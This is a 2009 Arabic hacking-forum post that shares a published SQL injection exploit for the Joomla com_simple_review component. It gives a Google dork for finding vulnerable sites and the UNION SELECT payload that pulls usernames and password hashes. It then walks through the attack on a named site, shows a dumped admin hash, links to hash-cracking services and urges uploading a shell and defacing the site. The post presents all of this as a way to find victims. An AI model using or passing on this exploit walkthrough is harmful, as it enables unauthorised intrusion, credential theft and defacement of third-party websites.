منتديات بحر العذااب
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


نـور المنتـدى بالعضـو الجـديـد محمد
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

منتديات بحر العذااب :: عالم الاتصالات والكمبيوتر :: عالم الهكررررز
 

 ثغرة اليوم نزلت لحقوو

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
المدير العام
المدير العام



عدد الرسائل : 181
تاريخ التسجيل : 13/06/2008

ثغرة اليوم نزلت لحقوو Empty
مُساهمةموضوع: ثغرة اليوم نزلت لحقوو   ثغرة اليوم نزلت لحقوو Icon_minitimeالأربعاء يناير 21, 2009 2:33 pm
السلام عليكم ورحمة الله وبركاته

حبائبي أعضاء المنتدى

فاليوم قلت بروح أشوف أخر الثغرات فاوجدت لكم ثغره ثغرة اليوم نزلت لحقوو 10

مواقع كثيره م......


طبعا اليوم نزلت يعني بتلحق على ضحايا ثغرة اليوم نزلت لحقوو 11

كود PHP:
simple_review Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label Hippi Godlike Nitrous

#[!] Module_Name: com_simple_review
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_simple_review"
########################################

www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--

<name>simple_review</name>
<creationDate>29/05/2006</creationDate>
<author>Rowan Youngson</author>
<copyright>This component in released under the Mozilla Public License Version 1.1</copyright>
<authorEmail> rowans@gmail.com </authorEmail>

<authorUrl>www.row1.info</authorUrl>
<version>1.3.5</version>
<description>Simple Review is a Review component for the Mambo CMS</description>

# milw0rm.com [2009-01-05]




شرح الثغرة






أبحث عن:

كود PHP:
inurl:"com_simple_review"



أوك حلو الحين فتح معنا وطلعت المواقع المصابه الحين أختر أي موقع ياحبيبي

طيب لنفترض أنك أخترات هذا الموقع

http://joomla.smartmobil.no

طيب الحين نبغي نحط الأ ستغلال كيف أناأقولك كيف

أول وين الأستغلال هذا هو


كود PHP:
index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--



طيب عرفنا الأستغلال طيب حلو الحين نجرب على موقعنا الي وجدناه

كيف نضع الأستغلال ؟؟

أقولك يالغالي كيف يابعدي

هذا موقعنا المراد أختراقه
http://joomla.smartmobil.no

أوك نضع الأستغلال بعد رابط المواقع كذا بيكون


كود PHP:
http://joomla.smartmobil.no/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--






طيب نشوف يطلع لنا الباسورد ولا مرقع الثغره الموقع يلا خلونا نشوف


لووووووووووووووووووووووول طلع لنا الباسورد واليزور




هذا اليوزر :
admin


هذا الباسورد

f372d16df9f2e7a8ab91cc92b662e2a7


لكن الباسورد مشفر ثغرة اليوم نزلت لحقوو 1


لكن ولا يهمك نجيبه نجيبه ننط لموقع مليروم


من هنا

http://www.milw0rm.com/cracker/insert.php


أو هذا الموقع

http://md5.rednoize.com/



وونضع الهاش حقنا وننتضر لين ينفك الهاش وأذا انفك أدخل على الموقع وأرفع شيل وأدعس عليه

الشرح منقول من الأخ AzoZ

Arrow
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://almo7b.yoo7.com
 
ثغرة اليوم نزلت لحقوو
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات بحر العذااب :: عالم الاتصالات والكمبيوتر :: عالم الهكررررز-
انتقل الى: